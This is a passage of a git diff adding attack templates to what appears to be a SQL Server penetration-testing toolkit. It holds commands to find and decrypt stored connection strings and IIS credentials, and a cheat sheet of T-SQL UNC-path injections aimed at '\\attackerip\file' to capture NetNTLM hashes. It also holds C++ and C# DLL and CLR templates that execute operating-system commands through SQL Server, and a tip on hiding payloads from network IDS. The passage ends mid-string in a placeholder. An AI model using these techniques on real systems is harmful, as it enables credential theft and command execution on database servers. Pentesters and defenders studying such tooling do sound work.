+Server=(local);Database=Master;Integrated Security=SSPI;Connection Timeout=1" +Server=(.);Database=Master;Integrated Security=SSPI;Connection Timeout=1" + +Dedicated Admin Connection +Server=DAC:Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1" + + +----------------------- +Other Options +----------------------- + +Spoof Application Client +Data Source=(local);Initial Catalog=AdventureWorks;Integrated Security=True;Application Name="My Application" +Data Source=(local);Initial Catalog=AdventureWorks;Integrated Security=True;ApplicationName=".Net SqlClient Data Provider" +determine app name in sql server: select APP_NAME() + +Set Encryption +Driver='ODBC Driver 11 for SQL Server';Server=ServerNameHere;Encrypt=YES;TrustServerCertificate=YES +Data Source=(local);Initial Catalog=AdventureWorks;Integrated Security=True;Application Name="My Application";Encrypt=Yes + +Encrypt Flag Notes: +Data sent between client and server is encrypted using SSL. The name (or IP address) in a Subject Common Name (CN) or +Subject Alternative Name (SAN) in a SQL Server SSL certificate should exactly match the server name (or IP address) +specified in the connection string. + +Set Packet Size +https://msdn.microsoft.com/en-us/library/system.data.sqlclient.sqlconnection.packetsize(v=vs.110).aspx +Note: This could potentially be used to obfuscate malicious payloads from network IDS going over unencrypted connections. +"Data Source=(local);Initial Catalog=AdventureWorks;Integrated Security=SSPI;Packet Size=512" + +----------------------- +Online References +----------------------- + +https://msdn.microsoft.com/en-us/library/ms130822.aspx +https://msdn.microsoft.com/en-us/library/ms188642.aspx +https://technet.microsoft.com/en-us/library/ms191260(v=sql.105).aspx +https://technet.microsoft.com/en-us/library/ms187662(v=sql.105).aspx +https://technet.microsoft.com/en-us/library/ms189307(v=sql.105).aspx +https://technet.microsoft.com/en-us/library/ms178068(v=sql.105).aspx +https://technet.microsoft.com/en-us/library/ms189595(v=sql.105).aspx +https://msdn.microsoft.com/en-us/library/ms254500(v=vs.110).aspx +https://msdn.microsoft.com/en-us/library/hh568455(v=sql.110).aspx +https://msdn.microsoft.com/en-us/library/system.data.sqlclient.sqlconnectionstringbuilder(v=vs.110).aspx +https://msdn.microsoft.com/en-us/library/system.data.sqlclient.sqlconnectionstringbuilder.applicationname(v=vs.110).aspx +https://www.connectionstrings.com/sql-server/ + + +------------------------------------------------------------------ +FINDING CONNECTION STRINGS +------------------------------------------------------------------ + +----------------------- +ODBC/DNS Notes +----------------------- +https://technet.microsoft.com/en-us/library/hh771015.aspx +https://technet.microsoft.com/en-us/library/hh771014.aspx + +Get all install ODBC drivers +Get-OdbcDriver + +Get all install ODBC drivers for SQL Server that are 64 bit +Get-OdbcDriver -Name "SQL Server*" -Platform "64-bit" + +Get all ODBC User DSNs for specified driver +$DsnArray = Get-OdbcDsn -DriverName "SQL Server*" + +Get ODBC System DSNs by name +Get-OdbcDsn -Name "MyPayroll" -DsnType "System" -Platform "32-bit" + +Get ODBC DSNs with names that contain a string +Get-OdbcDsn -Name "*Payroll*" + + +------------------------------- +Universal Data Link (UDL) Files +------------------------------- +https://msdn.microsoft.com/en-us/library/e38h511e(v=vs.71).aspx + +.UDL files often contain connection strings in a format similar to: + +[oledb] +; Everything after this line is an OLE DB initstring +Provider=SQLOLEDB.1;Persist Security Info=False;Data Source=servername;Initial Catalog=Northwind;Integrated Security=SSPI + +Finding UDL files +c: +cd \ +dir /s /b *.udl +Get-ChildItem -Path C:\ -Filter *.udl -Recurse | select fullname + + +------------------------------ +ApplicationHost.config Files +------------------------------ +https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/ + +Decrypt Entire Config File +-- +1. List application pools. + +appcmd list apppools +appcmd list apppools /text:MyTestPool + +2. Get clearext configuration file for specific pool. + +appcmd list apppool "MyTestPool" /text:* + +Decrypt Virtual Directory and Application Credentials in Config File +-- +1. List virtual directories. + +appcmd list vdir + +2. List configuration content. + +appcmd list vdir "Bike Shop/" /text:* + +------------------------------ +Web.config Files +------------------------------ +https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/#2 + +Finding web.config files +-- +c: +cd \ +dir /s /b web.config +Get-ChildItem -Path C:\ -Filter web.config -Recurse | select fullname + +Finding registered web.config files via appcmd.exe +-- +Common Paths: +C:\Program Files\IIS Express\appcmd.exe +C:\Program Files (x86)\IIS Express\appcmd.exe +%windir%\system32\inetsrv\appcmd + +Common Commands: +%windir%\system32\inetsrv\appcmd list vdir +dir /s /b v | find /I "web.config" + +Decrypted Web.config with aspnet_regiis.exe +-- +C:\Windows\Microsoft\.NETFrameworkv\2.0.50727\aspnet_regiis.exe -pdf "connectionStrings" c:\MyTestSite + diff --git a/templates/CheatSheet_SMO_Commands.ps1 b/templates/CheatSheet_SMO_Commands.ps1 new file mode 100644 index 0000000..6d1114d --- /dev/null +++ b/templates/CheatSheet_SMO_Commands.ps1 @@ -0,0 +1,117 @@ +# Script Name: +# SQL Server SMO Cheatsheet (0.CheatSheet-SqlServerSmo.ps1) +# Author: +# Scott Sutherland (@_nullbind), 2015 NetSPI +# Description: +# This file contains basic examples that show how to query SQL Server +# for configuration information using the SQL Server SDK SMO APIs. +# Requirements: +# The examples in this cheatsheet require two SMO libraries that get installed with SQL Server. +# The file names have been listed below: +# - Microsoft.SqlServer.Smo.dll +# - Microsoft.SqlServer.SmoExtended.dll +# References: +# https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.management.smo.server.aspx + +# Import SMO Libs - required for all examples below +[System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.Smo") | Out-Null +[System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SmoExtended")| Out-Null + +# Authenticate - Integrated Windows Auth - works +$srv = new-object ('Microsoft.SqlServer.Management.Smo.Server') "server\instance" + +# Get instance option +[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources() + +# Authenticate - SQL Server authentication - mixed mode - works +$srv = new-object ('Microsoft.SqlServer.Management.Smo.Server') "10.1.1.1" +$srv.ConnectionContext.LoginSecure=$false; +$srv.ConnectionContext.set_Login("user"); +$srv.ConnectionContext.set_Password("password") +$srv.Information + +# Get version / server information +$srv.Information +$srv.Name +$srv.NetName +$srv.ComputerNamePhysicalNetBIOS +$srv.Version +$srv.VersionMajor +$srv.VersionMinor +$srv.Edition +$srv.EngineEdition +$srv.OSVersion +$srv.DomainInstanceName +$srv.DomainName +$srv.SqlDomainGroup + +# Get service informaiton +$srv.ServiceName +$srv.ServiceAccount +$srv.ServiceStartMode +$srv.BrowserServiceAccount + +# Get state information +$srv.State +$srv.Status + +# Get listener information +$srv.NamedPipesEnabled +$srv.TcpEnabled + +# Get directory path information +$srv.RootDirectory +$srv.InstallDataDirectory +$srv.InstallSharedDirectory +$srv.ErrorLogPath +$srv.MasterDBLogPath +$srv.MasterDBPath +$srv.BackupDirectory + +# Logins, roles, and privilege information +$srv.ConnectionContext +$srv.LoginMode +$srv.Logins +$srv.Roles +$srv.EnumServerPermissions() + +# Window accounts / groups assigned logins in SQL Server +$srv.EnumWindowsUserInfo() +$srv.EnumWindowsUserInfo() | select "account name" +$srv.EnumWindowsDomainGroups() +$srv.EnumWindowsGroupInfo("Domain Admins") + +# Credentials / proxy_account +$srv.Credentials +$srv.ProxyAccount + +# Databse information +$srv.Databases + +# cluster / mirror information +$srv.IsClustered +$srv.ClusterName +$srv.EnumClusterMembersState +$srv.EnumClusterSubnets +$srv.EnumDatabaseMirrorWitnessRoles() + +# SQL Server settings +$srv.Configuration +$srv.Settings +$srv.Properties +$srv.Mail +$srv.MailProfile +$srv.Triggers +$srv.AuditLevel +$srv.Audits +$srv.LinkedServers +$srv.Endpoints +$srv.JobServer +$srv.EnumServerAttributes() + +# SQL Server enumeration +# https://msdn.microsoft.com/en-us/library/ms210366.aspx +$srv.PingSqlServerVersion("server\Standard") +$srv.PingSqlServerVersion("1.1.1.1",'sa','password') +$SQLSvr = [Microsoft.SqlServer.Management.Smo.SmoApplication]::EnumAvailableSqlServers($true); $SQLSvr | Out-GridView + diff --git a/templates/CheatSheet_UncPathInjection.txt b/templates/CheatSheet_UncPathInjection.txt new file mode 100644 index 0000000..f2df2de --- /dev/null +++ b/templates/CheatSheet_UncPathInjection.txt @@ -0,0 +1,221 @@ +This is a list of SQL Server commands that support UNC path [injections] by default. +The injections can be used to capture or replay the NetNTLM password hash of the +Windows account used to run the SQL Server service. The SQL Server service account +has sysadmin privileges by default in all versions of SQL Server. + +Note: This list is most likely not complete. + +----------------------------------------------------------------------- +-- UNC Path Injections Executable by the Public Fixed Server Role +----------------------------------------------------------------------- +-- Note: All are supported by SQL Server 2000 to 2016 (excluding azure) + +-- XP_DIRTREE Extended Stored Procedure +-- Fix: "revoke execute on xp_dirtree to public" + +xp_dirtree '\\attackerip\file' +GO + +-- XP_FILEEXIST Extended Stored Procedure +-- Fix: "revoke execute on xp_fileexist to public" + +xp_fileexist '\\attackerip\file' +GO + +-- BACKUP Command +-- Note: The Public role can't actually execute the backup, but the UNC path is resolved prior to the authorization check. +-- Fix: https://technet.microsoft.com/library/security/MS16-136, https://technet.microsoft.com/en-us/library/security/mt674627.aspx +-- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you. + +BACKUP LOG [TESTING] TO DISK = '\\attackerip\file' +GO + +BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file' +GO + +-- RESTORE Command +-- Note: The Public role can't actually execute the RESTORE, but the UNC path is resolved prior to the authorization check. +-- Fix: https://technet.microsoft.com/library/security/MS16-136, https://technet.microsoft.com/en-us/library/security/mt674627.aspx +-- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you. + +RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file' +GO + +RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file' +GO + +RESTORE HEADERONLY FROM DISK = '\\attackerip\file' +GO + +RESTORE FILELISTONLY FROM DISK = '\\attackerip\file' +GO + +RESTORE LABELONLY FROM DISK = '\\attackerip\file' +GO + +RESTORE REWINDONLY FROM DISK = '\\attackerip\file' +GO + +RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' +GO + +------------------------------------------------------ +-- Executable by the Sysadmin fixed server +-- and with other non Public roles / privileges +------------------------------------------------------ +-- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design. + +-- Create assembly +CREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE; +GO + +-- Add exteneded stored procedure +sp_addextendedproc 'xp_hello','\\attackerip\file' + +-- Create Certificate +CREATE CERTIFICATE testing123 + FROM EXECUTABLE FILE = '\\attackerip\file'; +GO + +-- Backup Certificate +BACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file' + WITH PRIVATE KEY (decryption by password = 'superpassword', + FILE = '\\attackerip\file', + encryption by password = 'superpassword'); +go + +-- Backup to file - Master Key +BACKUP MASTER KEY TO FILE = '\\attackerip\file' + ENCRYPTION BY PASSWORD = 'password' +GO + +-- Backup to file - Service Master Key +BACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file' + ENCRYPTION BY PASSWORD = 'password' +go + +-- Restore from file - Master Key +RESTORE MASTER KEY FROM FILE = '\\attackerip\file' + DECRYPTION BY PASSWORD = 'password' + ENCRYPTION BY PASSWORD = 'password' +go + +-- Restore from file - Service Master Key +RESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file' + DECRYPTION BY PASSWORD = 'password' +go + +-- Read data from file - Bulk insert 1 +CREATE TABLE #TEXTFILE (column1 NVARCHAR(100)) +BULK INSERT #TEXTFILE FROM '\\attackerip\file' +DROP TABLE #TEXTFILE + +-- Read data from file - Bulk insert 2 +CREATE TABLE #TEXTFILE (column1 NVARCHAR(100)) +BULK INSERT #TEXTFILE FROM '\\attackerip\file' +WITH (FORMATFILE = '\\testing21\file') +DROP TABLE #TEXTFILE + +-- Read data from a file - fn_xe_file_target_read_file +SELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null) +GO + +-- Read data from a file - fn_get_audit_file +SELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default); +GO + +-- Create Server Audit to File +CREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file'); +GO + +-- Install a cryptographic provider +sp_configure 'EKM provider enabled',1 +RECONFIGURE +GO +CREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file'; +GO + +-- External file format - Azure only +CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file'); +GO + +-- xp_subdirs +xp_subdirs '\\attackerip\file' + +-- xp_cmdshell +xp_cmdshell 'dir \\attackerip\file' + + +-- OpenRowSet +General Notes: +- 2k5 and up +- You must be a sysadmin. Running the TSQL below with can be used to capture the SQL Server service account password hash. +- This can also be used to transparently execute commands on remote SQL Servers; IF the servers share a service account and you are running as a sysadmin. This is just exploiting shared service accounts in a new way. + +EXEC sp_configure 'show advanced options', 1 +RECONFIGURE +GO +EXEC sp_configure 'ad hoc distributed queries', 1 +RECONFIGURE +GO + +-- passthrough sql service auth if your a sysadmin +DECLARE @sql NVARCHAR(MAX) +set @sql = 'select a.* from openrowset(''SQLNCLI'', ''Server=evilserver;Trusted_Connection=yes;'', ''select * from master.dbo.sysdatabases'') as a' +select @sql +EXEC sp_executeSQL @sql + +--Excel 2007-2010 (unc injection) +-- requires ad-hoc queries to be enabled, but then it can be run by any login +SELECT * --INTO #productlist +FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', + 'Excel 12.0 Xml;HDR=YES;Database=\\server\temp\Products.xlsx', + 'SELECT * FROM [ProductList$]'); + +--Excel 97-2003(unc injection) +-- requires ad-hoc queries to be enabled, but then it can be run by any login +SELECT * --INTO #productlist +FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', + 'Excel 8.0;HDR=YES;Database=\\server\temp\Products.xls', + 'select * from [ProductList$]'); + +Source: https://www.experts-exchange.com/articles/3025/Retrieving-Data-From-Excel-Using-OPENROWSET.html + +--old Excel with new ACE driver - working query 1 (unc injection) +SELECT * --INTO #productlist +FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', + 'Excel 8.0;HDR=YES;Database=\\server\temp\Products.xls', + 'SELECT * FROM [ProductList$]'); + +--old Excel with new ACE driver - working query 2 (unc injection) +SELECT * --INTO #productlist +FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', + 'Excel 12.0;HDR=YES;Database=\\server\temp\Products.xls', + 'SELECT * FROM [ProductList$]'); + +--(unc injection) +SELECT * --INTO #productlist +FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0', + 'Excel 12.0 Xml;HDR=YES;Database=\\server\temp\Products.xlsx', + 'SELECT * FROM [ProductList$]'); + +-- requires sysadmin or db_owner role +SELECT * FROM fn_dump_dblog(NULL,NULL,'DISK',1 +,'\\attackerip\fakefile.bak' +,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL +,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL +,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL +,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL +,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL +,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL +,NULL,NULL,NULL,NULL) + +--OpenDataSource +-- works on everything since 2k8, requires ad-hoc queries to be enabled, but then it can be run by any login +- Ref: https://msdn.microsoft.com/en-us/library/ms179856.aspx +SELECT * FROM OPENDATASOURCE('Microsoft.Jet.OLEDB.4.0','Data Source=\\server1\DataFolder\Documents\TestExcel.xls;Extended Properties=EXCEL 5.0')...[Sheet1$] ; + +-- Web Dav Notes +xp_dirtree '\\hostname@SSL\test' --ssl 443 +xp_dirtree '\\hostname@SSL@1234\test' --ssl port 1234 +xp_dirtree '\\hostname@1234\test' --http diff --git a/templates/VB and JS Scripts Examples b/templates/VB and JS Scripts Examples new file mode 100644 index 0000000..1ba1b04 --- /dev/null +++ b/templates/VB and JS Scripts Examples @@ -0,0 +1,22 @@ +@command=N'function RunCmd() +{ + + var objShell = new ActiveXObject("shell.application"); + objShell.ShellExecute("cmd.exe", + "/c echo hello > c:\\windows\\temp\\blah.txt", + "", + "open", + 0); + } + +RunCmd();’ + + +@command=N'FUNCTION Main() + +dim shell +set shell= CreateObject ("WScript.Shell") +shell.run("c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\blah.txt") +set shell = nothing + +END FUNCTION’, diff --git a/templates/cmd_exec.cpp b/templates/cmd_exec.cpp new file mode 100644 index 0000000..5540a4d --- /dev/null +++ b/templates/cmd_exec.cpp @@ -0,0 +1,69 @@ +// DllMain.cpp +// Reference: http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure +// Note: Compile for 32 and 64 +// Manual +// rundll32 evil32.dll,RunCmd +// rundll32 evil32.dll,RunPs +// rundll32 evil64.dll,RunCmd +// rundll32 evil64.dll,RunPs +// Register DLL in SQL Server Examples +// sp_addextendedproc 'RunCmd', 'c:\Temp\evil32.dll'; +// sp_addextendedproc 'RunCmd', 'c:\Temp\evil64.dll'; +// sp_addextendedproc 'RunPs', 'c:\Temp\evil32.dll'; +// sp_addextendedproc 'RunPs', 'c:\Temp\evil64.dll'; +// sp_addextendedproc 'RunPs', '\\server\share\evil64.dll'; :) - DLL doesn't need to be hosted on target system's disk +// Run Command Examples +// RunCmd "whoami" +// RunPs "write-output 'Hellow World' | Out-File c:\temp\file.txt" +// Remove Procedures +// sp_dropextendedproc 'RunCmd'; +// sp_dropextendedproc 'RunPs'; +// Todo: https://technet.microsoft.com/en-us/library/aa197372(v=sql.80).aspx + +#include "stdafx.h" //dllmain.cpp : Defines the entry point for the DLL application. +#include "srv.h" //Must get from C:\Program Files (x86)\Microsoft SQL Server\80\Tools\DevTools\Include +#include "shellapi.h" //needed for ShellExecute +#include "string" //needed for std:string + +BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ + + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + system("echo This is a test. > c:\\Temp\\test_dllmain.txt"); + return 1; +} + +#define RUNCMD_FUNC extern "C" __declspec (dllexport) +RUNCMD_FUNC int __stdcall RunCmd(const char * Command) { + + // Run OS command with ShellExecute + ShellExecute(NULL, TEXT("open"), TEXT("cmd"), TEXT(" /C echo This is a test. > c:\\Temp\\test_cmd2.txt"), TEXT(" C:\\ "), SW_SHOW); + + // Run OS command with system hard coded + system("echo This is a test. > c:\\Temp\\test_cmd1.txt"); + + // Run OS command with system hard coded from variable + const char *pdata = "echo This is a test. > c:\\Temp\\test_cmd3.txt"; + system(pdata); + + // Run OS command with system from arg + system(Command); + + return 1; +} + +#define RUNPS_FUNC extern "C" __declspec (dllexport) +RUNPS_FUNC int __stdcall RunPs(const char * Command) { + + // Run PowerShell command + ShellExecute(NULL, TEXT("open"), TEXT("powershell"), TEXT(" -C \" 'This is a test.'|out-file c:\\temp\\test_ps2.txt \" "), TEXT(" C:\\ "), SW_SHOW); + system("PowerShell -C \"'This is a test.'|out-file c:\\temp\\test_ps1.txt\""); + + return 1; +} diff --git a/templates/cmd_exec.cs b/templates/cmd_exec.cs new file mode 100644 index 0000000..8984d42 --- /dev/null +++ b/templates/cmd_exec.cs @@ -0,0 +1,47 @@ +// CLR assembly template for SQL Server that can execute os commands +// Based on the following online resources: +// - https://msdn.microsoft.com/en-us/library/ff878250.aspx +// - https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx +// - http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ +// Compile example: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs + +using System; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using Microsoft.SqlServer.Server; +using System.IO; +using System.Diagnostics; +using System.Text; + +public partial class StoredProcedures +{ + [Microsoft.SqlServer.Server.SqlProcedure] + public static void cmd_exec (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the begining of the result-set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result-set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + } +}; diff --git a/templates/evil.cpp b/templates/evil.cpp new file mode 100644 index 0000000..68826bd --- /dev/null +++ b/templates/evil.cpp @@ -0,0 +1,40 @@ +// DllMain.cpp (Compile for both 32 and 64 bit) +// Reference: http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure +// Manual run: rundll32 evil64.dll,xp_evil +// Register SQL Server xp via local disk: sp_addextendedproc 'RunCmd', 'c:\Temp\evil64.dll'; +// Register SQL Server xp via UNC path: sp_addextendedproc 'RunCmd', '\\127.0.0.1\C$\Temp\evil64.dll'; +// Run xp: xp_evil 'echo hello > c:\temp\file.txt' +// Remove xp: sp_dropextendedproc 'xp_evil'; + +#include "stdio.h" +#include "stdafx.h" +#include "srv.h" +#include "shellapi.h" +#include "string" + +BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { + + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return 1; +} + +__declspec(dllexport) ULONG __GetXpVersion() +{ + return 1; +} + +#define RUNCMD_FUNC extern "C" __declspec (dllexport) +RUNCMD_FUNC int __stdcall EVILEVILEVILEVILEVIL() { + + const char *pdata = "REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!RE